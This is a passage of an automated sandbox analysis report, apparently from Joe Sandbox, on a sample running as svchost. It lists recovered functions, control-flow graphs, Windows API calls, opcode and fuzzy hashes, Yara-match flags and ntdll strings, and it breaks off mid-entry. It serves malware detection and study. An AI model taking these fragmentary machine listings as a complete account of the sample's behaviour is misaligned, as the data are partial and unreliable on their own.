                                                                                                              • String ID: YYP
                                                                                                              • API String ID: 0-3579722852
                                                                                                              • Opcode ID: 113978638282103915def066ad1298d41a2fb2d7ff7c963717b5491b04342eae
                                                                                                              • Instruction ID: fe1ad6525b362cfe2ce52d82069e34ae102986fd448c9d6f639efb77696189a1
                                                                                                              • Opcode Fuzzy Hash: 113978638282103915def066ad1298d41a2fb2d7ff7c963717b5491b04342eae
                                                                                                              • Instruction Fuzzy Hash: 71F190B1D0021AAFDB24DFA5CC85AEFB7B8AF44304F1481AEE504A7341DB745A85CFA5
                                                                                                              Function 004175E3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 439 4175e3-41760c call 42f283 442 417612-417620 call 42f883 439->442 443 41760e-417611 439->443 446 417630-417641 call 42dbc3 442->446 447 417622-41762d call 42fb23 442->447 452 417643-417657 LdrLoadDll 446->452 453 41765a-41765d 446->453 447->446 452->453
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: e7dc6d0ee477ae157b340f19dc69921457d9f0c8687afbf7a2d1384491327b0c
                                                                                                              • Instruction ID: eb69db9bf8efaa2986cfdf4e607c5fc29a595e1f23a385f08c3c14a7654462b5
                                                                                                              • Opcode Fuzzy Hash: e7dc6d0ee477ae157b340f19dc69921457d9f0c8687afbf7a2d1384491327b0c
                                                                                                              • Instruction Fuzzy Hash: 7C015EB5E0020DABDB10DBE5DC52FDEB778AB54308F4041AAE90897240F635EB488BA5
                                                                                                              Function 0042C473 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 459 42c473-42c4af call 404943 call 42d6b3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,0041619F,001F0001,?,00000000,?,?,00000104), ref: 0042C4AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: ebf29b646508c508d37512dd22707bb04d2719e0d3e88c71623cf21526a7a6a3
                                                                                                              • Instruction ID: 8b6fd2d197a79738d68bafe02d71fa64aeff148017ff762ec0e8b83a03f38cc0
                                                                                                              • Opcode Fuzzy Hash: ebf29b646508c508d37512dd22707bb04d2719e0d3e88c71623cf21526a7a6a3
                                                                                                              • Instruction Fuzzy Hash: 4DE04F752142147BD620BA6ADC01F9B775CDFC9714F40442AFA0CA7242C6717A118AF4
                                                                                                              Function 03B735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b4f3a1170504b4744c6d099657bf5158c837aa7d99a25628a80a9163ffb8dc0e
                                                                                                              • Instruction ID: 6d3f0a7fd700c1af7b1ee7544ffee1e5ba14dcc11acc517313fb4e5bdb75c2d1
                                                                                                              • Opcode Fuzzy Hash: b4f3a1170504b4744c6d099657bf5158c837aa7d99a25628a80a9163ffb8dc0e
                                                                                                              • Instruction Fuzzy Hash: FE90023260550803D100B2584554746100687D0305FA5C461A042856DD87A58A51A5A2
                                                                                                              Function 03B72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0c499df046c512179ab2ca315732b3dcac7c1234cf9ee3d4079343c0d4957894
                                                                                                              • Instruction ID: 6883436cc4b3e33e1af51a918e60fb2c4cb71e64b60be0741dbec88ddb88343b
                                                                                                              • Opcode Fuzzy Hash: 0c499df046c512179ab2ca315732b3dcac7c1234cf9ee3d4079343c0d4957894
                                                                                                              • Instruction Fuzzy Hash: E2900262202404034105B2584454656400B87E0305B95C071E1018595DC6358991A125
                                                                                                              Function 03B72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7130a6a674fdb51d6b48f789b9495427c2b3d95c70cf064f85dd9981c749d969
                                                                                                              • Instruction ID: 2677b3914d151947ea7724144869cbad44b00278486d6215f6e4e6afbbbea5f4
                                                                                                              • Opcode Fuzzy Hash: 7130a6a674fdb51d6b48f789b9495427c2b3d95c70cf064f85dd9981c749d969
                                                                                                              • Instruction Fuzzy Hash: E990023220140813D111B2584544747000A87D0345FD5C462A042855DD97668A52E121
                                                                                                              Function 03B72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: dd6eb4b0f19c5d051a2a5bb2af1d6b901362b0308c6881cf29d08942137d6d16
                                                                                                              • Instruction ID: 5f60b8b7f756a153d514387fa12c55004aaa805e28d7c1bb60b70dd5cae4abfb
                                                                                                              • Opcode Fuzzy Hash: dd6eb4b0f19c5d051a2a5bb2af1d6b901362b0308c6881cf29d08942137d6d16
                                                                                                              • Instruction Fuzzy Hash: 1490023220148C03D110B258844478A000687D0305F99C461A442865DD87A58991B121
                                                                                                              Function 00413E13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(6U0173jM,00000111,00000000,00000000), ref: 00413E8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 6U0173jM$6U0173jM
                                                                                                              • API String ID: 1836367815-1980910963
                                                                                                              • Opcode ID: 0c8b893c510d0dcaf08578d5b6df2875e19754c40e04aac85f8afd7264447134
                                                                                                              • Instruction ID: fea165e1381c19dd71759ed6335f3e35b894f11218b1a295a30d0f045c5b477b
                                                                                                              • Opcode Fuzzy Hash: 0c8b893c510d0dcaf08578d5b6df2875e19754c40e04aac85f8afd7264447134
                                                                                                              • Instruction Fuzzy Hash: 5B01D6B2D0025C7BEB11AAE59C81DEFBB7CDF40398F448069FA14A7241D6784F064BA5
                                                                                                              Function 00413DE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 15 413de7-413dec 16 413e32-413e45 call 42f033 15->16 17 413dee 15->17 20 413e4b-413e7d call 4048b3 call 424d23 16->20 21 413e46 call 4175e3 16->21 17->16 26 413e9d-413ea3 20->26 27 413e7f-413e8e PostThreadMessageW 20->27 21->20 27->26 28 413e90-413e9a 27->28 28->26
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(6U0173jM,00000111,00000000,00000000), ref: 00413E8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 6U0173jM$6U0173jM
                                                                                                              • API String ID: 1836367815-1980910963
                                                                                                              • Opcode ID: fb4e05768b21ddeb1c04338f038ed874d0e7281a6d2481d082ba2c8e610aa072
                                                                                                              • Instruction ID: e752819fb37ed903d7967cebaff85f9e43f1b515d786eb7c96f0e76a13d88736
                                                                                                              • Opcode Fuzzy Hash: fb4e05768b21ddeb1c04338f038ed874d0e7281a6d2481d082ba2c8e610aa072
                                                                                                              • Instruction Fuzzy Hash: 5101D672D0025C7BEB00AAA19C81DFFA77CDF81358F41816AF908A7201D53D4E064BE5
                                                                                                              Function 00413DCF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 29 413dcf-413e7d call 4175e3 call 4048b3 call 424d23 37 413e9d-413ea3 29->37 38 413e7f-413e8e PostThreadMessageW 29->38 38->37 39 413e90-413e9a 38->39 39->37
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(6U0173jM,00000111,00000000,00000000), ref: 00413E8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 6U0173jM$6U0173jM
                                                                                                              • API String ID: 1836367815-1980910963
                                                                                                              • Opcode ID: 10307aeb891519fc7c99e3c23575f98c41ed2e7d545c57804a02d36b1c5771eb
                                                                                                              • Instruction ID: b350f2cce0beea6be89d4c55736afbe9447f030722036109dcded40916d4fd72
                                                                                                              • Opcode Fuzzy Hash: 10307aeb891519fc7c99e3c23575f98c41ed2e7d545c57804a02d36b1c5771eb
                                                                                                              • Instruction Fuzzy Hash: EEF0B4B2A0535C7ADB125EE56C81CFFB77CDE81359B4180ABF904A7201E53D4F064BA5
                                                                                                              Function 0042C7C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 89 42c7c3-42c804 call 404943 call 42d6b3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C7FF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID: 'cA
                                                                                                              • API String ID: 3298025750-2370355221
                                                                                                              • Opcode ID: acfefdb3a80356bd212f12599f516ba1239d1a9b6fdfdac714d478c0783a85cf
                                                                                                              • Instruction ID: 555028ebcc251f7093260877fd94d5e3d617086eeaae4aa5e860ebc1e4e76462
                                                                                                              • Opcode Fuzzy Hash: acfefdb3a80356bd212f12599f516ba1239d1a9b6fdfdac714d478c0783a85cf
                                                                                                              • Instruction Fuzzy Hash: 8CE092B1304604BBD610EE69DC41F9B33ACEFC9714F00401DFA18A7281D670B9108BB5
                                                                                                              Function 0042C773 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 454 42c773-42c7b4 call 404943 call 42d6b3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E41E,?,?,00000000,?,0041E41E,?,?,?), ref: 0042C7AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: f4b77f2273dec16019d8b920b36054b3065a8ee74ed619d9597814caa3e3fcfc
                                                                                                              • Instruction ID: 89f1ee057969176d8101756f1d7f41c693a876ba1827579d7fa95cacfa7a8a70
                                                                                                              • Opcode Fuzzy Hash: f4b77f2273dec16019d8b920b36054b3065a8ee74ed619d9597814caa3e3fcfc
                                                                                                              • Instruction Fuzzy Hash: FAE039B17042047BD614EE69DC41E9B33ACEFC9714F004019B908A7241D670BA108AB4
                                                                                                              Function 0042C813 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 464 42c813-42c84f call 404943 call 42d6b3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,FE55239A,?,?,FE55239A), ref: 0042C84A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 37220d6bb7d26430c9c2d261d1f34f052576513aa5a3cfc15d8dcd44f9992afe
                                                                                                              • Instruction ID: e18374c5559ab9fc5c5b6c15d37306319b5ce2a2461c20285597c081504b34a8
                                                                                                              • Opcode Fuzzy Hash: 37220d6bb7d26430c9c2d261d1f34f052576513aa5a3cfc15d8dcd44f9992afe
                                                                                                              • Instruction Fuzzy Hash: D8E04F716006147BD120FA6ADC01F9B775CDFC5714F00442AFA08A7241CA71791186F4
                                                                                                              Function 03B72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 469 3b72c0a-3b72c0f 470 3b72c11-3b72c18 469->470 471 3b72c1f-3b72c26 LdrInitializeThunk 469->471
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c0418dbe30e96baf6200ef13fd143734ee9ab98a6a8c039403ced0db8299121c
                                                                                                              • Instruction ID: 2d487d78435103e02e83cb6e19726c3fe49692e4e1fd981e6f54681be026d0e3
                                                                                                              • Opcode Fuzzy Hash: c0418dbe30e96baf6200ef13fd143734ee9ab98a6a8c039403ced0db8299121c
                                                                                                              • Instruction Fuzzy Hash: D9B09B729015C5C6DA11F77046087177905E7D0705F59C4F1D3134646E4739C1D1E175

                                                                                                              Non-executed Functions

                                                                                                              Function 03BB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 096d41d88e939e6ccf7308d723033825cfc57407492e94b27b86967711eaf9cb
                                                                                                              • Instruction ID: 1a322a24e684f4f9d6bdef06fd434efbcae922b5a2ced3147a7cb9e5cb62d822
                                                                                                              • Opcode Fuzzy Hash: 096d41d88e939e6ccf7308d723033825cfc57407492e94b27b86967711eaf9cb
                                                                                                              • Instruction Fuzzy Hash: 14925C75604741AFD724DE14C884BAAB7F8EB84758F084DBDFA98DB250DBB0E844CB52
                                                                                                              Function 03B268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-3089669407
                                                                                                              • Opcode ID: 31a87270b27f052d7de45e0e2e04fcd1a366ff0ba2c6a8f3938eae7d4a54ae68
                                                                                                              • Instruction ID: 5c708a20d7dd229fb92db42a0962ddf23fa10d616197322428cd23f8b8a9ce15
                                                                                                              • Opcode Fuzzy Hash: 31a87270b27f052d7de45e0e2e04fcd1a366ff0ba2c6a8f3938eae7d4a54ae68
                                                                                                              • Instruction Fuzzy Hash: E08101B2D122186F8B25FB98EDC5EEEB7BDAB15614B044572B910FB114E770ED048BA0
                                                                                                              Function 03B68620 Relevance: 19.0, Strings: 15, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA54E2
                                                                                                              • I_wI_w@4_w@4_w, xrefs: 03BA5341, 03BA534D
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 03BA5543
                                                                                                              • Thread identifier, xrefs: 03BA553A
                                                                                                              • double initialized or corrupted critical section, xrefs: 03BA5508
                                                                                                              • Invalid debug info address of this critical section, xrefs: 03BA54B6
                                                                                                              • corrupted critical section, xrefs: 03BA54C2
                                                                                                              • Critical section debug info address, xrefs: 03BA541F, 03BA552E
                                                                                                              • Address of the debug info found in the active list., xrefs: 03BA54AE, 03BA54FA
                                                                                                              • undeleted critical section in freed memory, xrefs: 03BA542B
                                                                                                              • Critical section address., xrefs: 03BA5502
                                                                                                              • Critical section address, xrefs: 03BA5425, 03BA54BC, 03BA5534
                                                                                                              • 8, xrefs: 03BA52E3
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA54CE
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA540A, 03BA5496, 03BA5519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$I_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-4161880443
                                                                                                              • Opcode ID: 628687957c29558694ed17aa2393f6e0aef91a9b54719d1ec9a1a2d5f830a560
                                                                                                              • Instruction ID: b039365faca440efeac189cb215fa2d4cda356003bd3d60d8838e86bd836354e
                                                                                                              • Opcode Fuzzy Hash: 628687957c29558694ed17aa2393f6e0aef91a9b54719d1ec9a1a2d5f830a560
                                                                                                              • Instruction Fuzzy Hash: 4981B470A00758EFDB20CF98D841BAEBBB5FB45708F5441AAF518FB251D775AA40CB60
                                                                                                              Function 03B60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                              • API String ID: 0-360209818
                                                                                                              • Opcode ID: 1c0548c202060d31651ae2dea476d6fcb2a04f5c2a89f6f25375c946ca8abfd7
                                                                                                              • Instruction ID: 0e2be9d5f3147c3e701514e90ee9a3b446da7a99551cb5b8f06cff11d9ada112
                                                                                                              • Opcode Fuzzy Hash: 1c0548c202060d31651ae2dea476d6fcb2a04f5c2a89f6f25375c946ca8abfd7
                                                                                                              • Instruction Fuzzy Hash: FC62A0B5E04A298FDB64CF1CC8417A9B7B6FF85318F5882EAD449AB240D7365AD1CF40
                                                                                                              Function 03BE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                              • API String ID: 0-3591852110
                                                                                                              • Opcode ID: 0278a8eff2853692af35919d73fe0d34cc6d0ea1fc37d89417ae310a2987888c
                                                                                                              • Instruction ID: df8ef214af0bffc13d75945985a5767df760aafa95c28ae3d7f4e5c1f751b9f2
                                                                                                              • Opcode Fuzzy Hash: 0278a8eff2853692af35919d73fe0d34cc6d0ea1fc37d89417ae310a2987888c
                                                                                                              • Instruction Fuzzy Hash: 8B12AB74604641AFD725CF2CC441BBABBF5FF09708F2885E9E49A8B691D738E880DB50
                                                                                                              Function 03B4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                              • API String ID: 0-3197712848
                                                                                                              • Opcode ID: e54f5f146f2ccf9c5fbcdc1283d8e7b2a2488e8e92b052503030a43024e05058
                                                                                                              • Instruction ID: 8cbd99309fe4595ae76f451de458f06cb45c9aaa8bec9d420bd3bb9c60c400c4
                                                                                                              • Opcode Fuzzy Hash: e54f5f146f2ccf9c5fbcdc1283d8e7b2a2488e8e92b052503030a43024e05058
                                                                                                              • Instruction Fuzzy Hash: FB12DF71A083558BD724DF28C440BAAB7E4FF8570CF0809BAF985CB291EB74D944DB96
                                                                                                              Function 03B2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                              • API String ID: 0-3532704233
                                                                                                              • Opcode ID: b950314dcae319a016ec353f022f9c5e741a4e428f3518886290865da822c2fc
                                                                                                              • Instruction ID: 8bec8c5c7b74debbda359b9aac7e4aa092f70f8728b01fa6cd6be40cc059a4f3
                                                                                                              • Opcode Fuzzy Hash: b950314dcae319a016ec353f022f9c5e741a4e428f3518886290865da822c2fc
                                                                                                              • Instruction Fuzzy Hash: 9BB18C725083619FC721EF24C440B6BBBE8EB84758F054ABEF8A9DB240D770D945CB92
                                                                                                              Function 03BE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                              • API String ID: 0-1357697941
                                                                                                              • Opcode ID: b6ff42e5fd92557154d1c4e0664e1d50b23221db3ccdf2954e1393a1782a96f5
